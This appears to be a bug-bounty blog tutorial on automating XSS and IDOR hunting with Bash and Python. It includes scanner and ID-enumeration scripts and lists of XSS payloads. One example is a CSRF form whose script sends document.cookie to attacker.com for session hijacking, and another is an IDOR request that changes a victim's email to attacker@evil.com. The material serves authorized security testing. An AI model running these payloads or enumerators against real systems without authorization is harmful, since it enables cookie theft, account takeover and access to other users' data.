๐Ÿš€ Automate XSS & IDOR Bug Hunting Using Bash & Python โ€” A Hackerโ€™s Toolkit

8/22/2025

๐Ÿš€ Automate XSS & IDOR Bug Hunting Using Bash & Python โ€” A Hackerโ€™s Toolkit

Bug bounty hunting is part art, part science โ€” but itโ€™s mostly about consistency. Every hacker knows that manual recon and testing can be mind-numbing and repetitive. Thatโ€™s why building your own automation suite for common vulnerabilities like XSS and IDOR is a total game changer. ๐ŸŽฏ

In this blog, weโ€™ll explore how to build a modular, customizable automation toolkit using good old Bash and Python to help you:

  • ๐Ÿ” Find endpoints, forms, and params
  • ๐Ÿ’‰ Test for reflected and stored XSS
  • ๐Ÿ”‘ Hunt for Insecure Direct Object References (IDORs)
  • โš™๏ธ Chain your tools for full recon and exploitation

Whether youโ€™re a beginner tired of typing the same curl commands, or a seasoned hunter looking to improve efficiency โ€” this oneโ€™s for you. โค๏ธโ€๐Ÿ”ฅ

โš™๏ธ Why Build Your Own Suite?

๐Ÿค” Arenโ€™t There Tools Already?

Absolutely. Tools like:

  • Dalfox โ€“ ๐ŸฆŠ Fast XSS scanning
  • ParamSpider โ€“ ๐Ÿ•ท๏ธ Finds URL parameters
  • Arjun โ€“ ๐Ÿงช Discovers hidden GET/POST parameters
  • kxss โ€“ Finds potential XSS sinks

But hereโ€™s the thing:

๐Ÿง  โ€œThe real power is in combining them โ€” your way.โ€

Custom automation = Control + Speed + Creativity

๐Ÿ“ฆ Prerequisites

Before we build our suite, letโ€™s make sure you have:

  • โœ… Linux system or WSL (Ubuntu preferred)
  • โœ… Python 3.x installed (python3 --version)
  • โœ… Bash shell ready
  • โœ… Basic knowledge of XSS and IDOR vulnerabilities
  • โœ… Tools installed:
  • sudo apt install curl jq git pip install requests

Optional (but recommended):

๐Ÿงช Module 1: Parameter Discovery (Bash)

Letโ€™s start with finding parameters โ€” the doors to injection points ๐Ÿ”

#!/bin/bash

domain=$1echo "[*] Collecting endpoints for $domain..."mkdir -p output/$domain# Step 1: Collect URLsecho "[*] Using waybackurls..."waybackurls $domain | tee output/$domain/urls.txt# Step 2: Extract parametersecho "[*] Extracting URLs with parameters..."cat output/$domain/urls.txt | grep "=" | tee output/$domain/params.txtecho "[+] Done! Found $(wc -l < output/$domain/params.txt) URLs with params."

๐Ÿ“ Output:

output/โ””โ”€โ”€ example.com/ โ”œโ”€โ”€ urls.txt โ””โ”€โ”€ params.txt

Now youโ€™ve got a clean list of target URLs with parameters like:

https://example.com/search?q=testhttps://example.com/page?id=123

๐Ÿง  Module 2: XSS Detection (Python + Bash Hybrid)

Letโ€™s build a basic XSS injector that tests each parameter by injecting payloads.

xss_scanner.py ๐Ÿ‘‡

import requestsfrom urllib.parse import urlparse, parse_qs, urlencode

payload = "<script>alert(1)</script>"headers = {'User-Agent': 'XSSScanner/1.0'}def scan_xss(url): parsed = urlparse(url) query = parse_qs(parsed.query) for param in query: query[param] = payload new_query = urlencode(query, doseq=True) target = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}" try: r = requests.get(target, headers=headers, timeout=5) if payload in r.text: print(f"[!] Possible XSS in: {target}") except: passwith open("output/example.com/params.txt") as f: for line in f: scan_xss(line.strip())

๐Ÿง  Tip: Replaceย payloadย with advanced test strings or use a payload list.

๐Ÿ”„ Combine With Bash

Now automate:

#!/bin/bashdomain=$1echo "[*] Running XSS scanner for $domain..."python3 xss_scanner.py

๐Ÿ” Module 3: IDOR Hunting

Whatโ€™s IDOR?

IDOR stands for Insecure Direct Object Reference โ€” accessing someone elseโ€™s stuff by changing IDs.

Examples:

GET /profile?id=123 โžก๏ธ change to id=124

Automating IDOR Testing: idor_test.py ๐Ÿงช

import requests

session = requests.Session()base_url = "https://target.com/profile?id="# Authentication (if needed)session.cookies.set("session", "your_session_cookie")for i in range(1000, 1050): url = f"{base_url}{i}" r = session.get(url) if "user not found" not in r.text: print(f"[+] Interesting ID found: {url}")

Use this script when testing authenticated endpoints.

๐Ÿ” Bonus: Chaining Modules Together

Make your suite modular, so each tool feeds into the next:

./get_params.sh target.compython3 xss_scanner.pypython3 idor_test.py

Or build a main.sh like:

#!/bin/bashdomain=$1echo "[*] Running full XSS/IDOR suite on $domain"

./get_params.sh $domainpython3 xss_scanner.pypython3 idor_test.py

๐Ÿ“Š Module 4: Bruteforcing Hidden Parameters (Arjun + Python)

Hidden parameters are a goldmine for XSS and IDOR vulnerabilities โ€” especially in APIs and AJAX-heavy apps. Tools like Arjun scan for parameters that arenโ€™t obvious from URL structure but still accepted by the backend. ๐Ÿš€

๐Ÿ”ง Step 1: Installing Arjun

bash

CopyEdit

git clone https://github.com/s0md3v/Arjuncd Arjunpip3 install -r requirements.txtpython3 arjun.py -u https://example.com/api/user -m GET

๐Ÿค– Automating with Python

Hereโ€™s how to integrate Arjun into your suite with a wrapper script:

python

CopyEdit

import osimport subprocess

target_url = input("Enter the endpoint to bruteforce parameters: ")output_file = "output/arjun_params.txt"# Run Arjuncmd = f"python3 Arjun/arjun.py -u {target_url} -oT {output_file}"os.system(cmd)# Read discovered paramswith open(output_file) as f: print("\n[+] Discovered Parameters:") for param in f: print(" -", param.strip())

๐Ÿง  What to do with those parameters?

Once discovered, you can inject payloads like "<script>alert(1)</script>" into each param โ€” either manually or through your XSS scanner from Part

๐Ÿ” Module 5: Authentication Handling for Bug Hunting

Most real bugs lie behind login. Without session handling, your automation suite is half blind. ๐Ÿ˜ต

Letโ€™s add support for:

  • โœ… Cookie-based login
  • โœ… Header token injection (JWT, Bearer)
  • โœ… Session handling

๐Ÿ“œ auth_config.json

json

CopyEdit

{ "cookies": { "session": "your-session-id", "auth": "abcd1234" }, "headers": { "Authorization": "Bearer YOUR_API_TOKEN" }}

๐Ÿ“ฆ auth_handler.py

python

CopyEdit

import jsonimport requests

def get_auth_session(): with open("auth_config.json") as f: config = json.load(f) session = requests.Session() # Set cookies for name, value in config["cookies"].items(): session.cookies.set(name, value) # Set headers for header, value in config["headers"].items(): session.headers[header] = value return session

Now, update your XSS and IDOR scanner scripts to use auth_handler.get_auth_session() instead of raw requests.get().

๐Ÿ“ Module 6: Logging & Reporting for Bug Bounties

All the automation in the world is useless if you canโ€™t track results clearly. Hereโ€™s how to keep tidy records:

๐Ÿ“˜ Logging Template (Markdown)

markdown

CopyEdit

# ๐Ÿž Bug Report - XSS

**URL**: `https://example.com/profile?id=123` **Payload**: `<script>alert(1)</script>` **Response Contains Payload?** โœ… **Severity**: Medium **Notes**: Reflected input in `id` parameter. No input sanitization.

๐Ÿ“‹ Auto-generate Logs (Python)

python

CopyEdit

def log_bug(url, payload, issue_type="XSS"): with open(f"logs/{issue_type}.md", "a") as f: f.write(f"""### ๐Ÿž {issue_type.upper()} Bug

- **URL**: `{url}`- **Payload**: `{payload}`- **Timestamp**: {datetime.now().isoformat()}- **Notes**: Auto-detected by script---""")

๐Ÿ“ Folder Structure:

css

CopyEdit

logs/โ”œโ”€โ”€ XSS.mdโ”œโ”€โ”€ IDOR.mdโ””โ”€โ”€ summary.csv

๐Ÿงฑ Module 7: Integrating Burp Suite with Your Toolkit

While scripts are fast, Burp Suite is powerful for manual review and visual diffing.

๐ŸŽฏ Two Options:

๐Ÿ…ฐ๏ธ Option A: Send Traffic to Burp via Proxy

In Python:

python

CopyEdit

proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

requests.get(url, proxies=proxies, verify=False)

๐Ÿ…ฑ๏ธ Option B: Export URLs to Burp Intruder

bash

CopyEdit

cat output/example.com/params.txt > burp_targets.txt

In Burp:

  • Intruder โ†’ Load burp_targets.txt
  • Set payload positions
  • Launch attack with XSS/IDOR payload lists

๐Ÿ“ˆ Module 8: Visualizing Results with CSV & Charts

For bounty platforms or managers, graphs = clarity ๐Ÿ“Š

๐Ÿงฎ Python CSV Logger

python

CopyEdit

import csvfrom datetime import datetime

def log_csv(url, issue, payload): with open("logs/summary.csv", "a", newline="") as f: writer = csv.writer(f) writer.writerow([datetime.now(), url, issue, payload])

Then use Excel or Google Sheets to plot:

  • Total bugs
  • Bug types
  • Domains per bug

๐Ÿค– Final Integration โ€” Full Bash Workflow

Hereโ€™s what a one-liner execution might look like:

bash

CopyEdit

./main.sh example.com

main.sh โ€“ Combine All Modules

bash

CopyEdit

#!/bin/bashdomain=$1

echo "๐ŸŽฏ Starting Bug Hunting Suite on $domain"./get_params.sh $domainpython3 xss_scanner.pypython3 idor_test.pypython3 arjun_bruter.pypython3 log_summary.pyecho "โœ… Done! Check logs/ for output."

๐Ÿงช Module 9: Advanced XSS Testing

Finding XSS with <script>alert(1)</script> is just the beginning. Web apps today use DOM-heavy JavaScript, client-side routing, and input filters. That meansโ€ฆ more evasion needed ๐Ÿ˜ˆ

๐Ÿงจ Common Advanced Payloads

html

CopyEdit

"><svg/onload=alert(1)>"><img src=x onerror=alert(1)>"><body onresize=alert(1)>"><iframe srcdoc="<script>alert(1)</script>">

โœ… Pro tip: Use these with event handlers like onmouseover, onfocus, onerror.

๐Ÿ‘จโ€๐Ÿ’ป Adding Payload Rotation to XSS Scanner

Update xss_scanner.py with a payload list:

python

CopyEdit

payloads = [ "<script>alert(1)</script>", "\"><svg/onload=alert(1)>", "\"><img src=x onerror=alert(1)>", "' onfocus='alert(1)", "<body onresize=alert(1)>"]

def scan_xss(url): parsed = urlparse(url) query = parse_qs(parsed.query) for param in query: for payload in payloads: query[param] = payload new_query = urlencode(query, doseq=True) target = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}" try: r = requests.get(target, headers=headers, timeout=5) if payload in r.text: print(f"[!] XSS found in: {target}") log_bug(target, payload) except Exception as e: continue

๐Ÿงฌ Module 10: DOM-Based XSS Detection

DOM-based XSS doesnโ€™t reflect in the response body โ€” itโ€™s executed by JavaScript in the browser. So, tools like Dalfox, XSStrike, or even custom headless browsers help.

๐Ÿง  Detecting DOM XSS with Dalfox:

bash

CopyEd

dalfox url "https://example.com/profile?name=vipul"

โœ… Use -b to test blind XSS with your collaborator server.

๐Ÿ“ฆ Automation via Python

bash

CopyEdit

dalfox file output/example.com/params.txt -o dom_results.txt

Then read and parse dom_results.txt into your logging module.

๐Ÿ”— Module 11: Chaining Bugs โ€” XSS โ†’ CSRF โ†’ Account Takeover

Letโ€™s get creative! Sometimes bugs arenโ€™t critical alone, but together โ€” ๐Ÿ’ฅ boom.

๐Ÿ”ฅ Real-World Chain Example:

  1. ๐Ÿงฉ Found reflected XSS in profile name
  2. ๐ŸŽฃ Used it in an auto-submitting CSRF form:

<form action="https://victim.com/profile" method="POST"> <input type="hidden" name="name" value="<script>new Image().src='http://attacker.com?cookie='+document.cookie</script>"> </form>

  1. ๐Ÿง  Now attacker gets session cookie via image-based exfil.

๐Ÿ” Module 12: Real-World IDOR Exploitation Scenarios

IDOR is way more than just changing ?id=1.

Here are creative test cases:

1๏ธโƒฃ Email Change Endpoint

bash

CopyEdit

POST /api/user/update-emailBody: { "email": "attacker@evil.com", "user_id": "104" }

โžก๏ธ Try modifying user_id to access other usersโ€™ profiles. ๐Ÿ”“

2๏ธโƒฃ Password Reset Exploit

http

CopyEdi

POST /api/user/resetBody: { "email": "user1@victim.com" }

You sniff the request via CSRF/XSS and modify the reset token endpoint for your own account.

3๏ธโƒฃ File Access via Sequential ID

bash

CopyEdit

GET /files/download?id=200GET /files/download?id=201

โžก๏ธ Loop through numbers using Python:

python

CopyEdit

for i in range(100, 150): r = session.get(f"https://target.com/files/download?id={i}") if "PDF" in r.headers.get("Content-Type", ""): print(f"[+] Found file: ID {i}")

๐Ÿง‘โ€๐ŸŽ“ Module 13: Writing Killer Reports for Bug Bounty Platforms

๐ŸŽฏ The goal of automation is to reduce noise and focus on real bugs โ€” which means writing clear, impactful reports.

โœ… Report Checklist

  • Title: Clear & concise
  • Summary: What the issue is, how it affects the app
  • Steps to Reproduce
  • Proof of Concept (PoC) URL or curl command
  • Impact: What could an attacker do?
  • Suggested Fix

โœ๏ธ Example Report Template

yaml

CopyEdit

๐Ÿง  Summary:Reflected XSS vulnerability on the profile page via `name` parameter.

๐Ÿ” Steps to Reproduce:1. Visit: https://example.com/profile?name=<script>alert(1)</script>2. Alert box executes.๐ŸŽฏ Impact:Can be chained with CSRF to hijack sessions or steal tokens.๐Ÿ’ก Suggested Fix:Apply input sanitization and context-aware encoding.

๐ŸŒ Module 14: Webhooks & Instant Alerts ๐Ÿ“ฒ

You want your suite to notify you when it finds something โ€” no need to constantly check logs.

๐Ÿ”” Slack Notifications

Use a Slack webhook URL to send formatted alerts:

python

CopyEdi

import requestsfrom datetime import datetime

slack_webhook = "https://hooks.slack.com/services/XXX/YYY/ZZZ"def slack_alert(issue_type, url, payload): data = { "text": f"*{issue_type}* bug found!\nโ€ข URL: {url}\nโ€ข Payload: `{payload}`\nโ€ข Time: {datetime.now().isoformat()}" } requests.post(slack_webhook, json=data)

Call slack_alert(...) whenever you detect a bug.

๐Ÿ“ง Email Alerts (SMTP)

Optionally, notify yourself via email:

python

CopyEdit

import smtplibfrom email.mime.text import MIMEText

def email_alert(recipient, subject, body): msg = MIMEText(body) msg["Subject"] = subject msg["From"] = "scanner@yourdomain.com" msg["To"] = recipient s = smtplib.SMTP("smtp.yourprovider.com", 587) s.starttls() s.login("youruser", "yourpass") s.send_message(msg) s.quit()

๐Ÿ“ฆ Module 15: Packaging as a CLI Tool

Turn your scripts into a clean command-line tool for ease of use.

๐Ÿงฑ setup.py & CLI Structure

Create a Python package layout:

markdown

CopyEdit

xss_idor_suite/โ”œโ”€โ”€ __init__.pyโ”œโ”€โ”€ scanner.pyโ”œโ”€โ”€ auth_handler.pyโ”œโ”€โ”€ notifier.pyโ”œโ”€โ”€ utils.pyโ””โ”€โ”€ __main__.py

In __main__.py:

python

CopyEdit

import argparsefrom .scanner import scan_allfrom .auth_handler import get_auth_sessionfrom .notifier import slack_alert

parser = argparse.ArgumentParser(description="XSS/IDOR Automation Suite")parser.add_argument("--domain", required=True)parser.add_argument("--notify", action="store_true")args = parser.parse_args()session = get_auth_session()issues = scan_all(args.domain, session)if args.notify: for issue in issues: slack_alert(issue["type"], issue["url"], issue["payload"])

Then install with:

bash

CopyEdit

pip install -e .

Usage:

bash

CopyEdit

xss_idor_suite --domain example.com --notify

๐Ÿ—‚ Module 16: Hosting on GitHub & Open Source Best Practices

Letโ€™s make your tool public and usable by others.

โœ… Repository Readme

Include:

  • Project description
  • Usage instructions
  • Installation steps
  • Examples
  • License (MIT or Apache)
  • Contribution guidelines

๐Ÿ›  CI/CD Integration

Automate testing on GitHub actions:

  • Run unit/ smoke tests on scanner functions
  • Check for syntax/linting errors
  • Optional: Auto-deploy releases

๐Ÿ”„ Module 17: Continuous Recon (Cron Jobs & Automation)

Want daily scanning? Set up cron or cloud runners.

โณ Cron Example (Linux):

cron

CopyEdit

0 2 * * * cd /home/user/xss_idor_suite && xss_idor_suite --domain example.com --notify

โ˜๏ธ Using GitHub Actions or AWS Lambda

  • AWS: Trigger on schedule, push logs to S3 or email
  • GHA: Use scheduled workflow for automation and push results to logs

๐Ÿ”ง Module 18: Recap of All Modules

Press enter or click to view image in full size

๐Ÿ”— Connect With Me

If you enjoyed this guide and want more practical tutorials, recon checklists, and hacker strategies, stay in touch: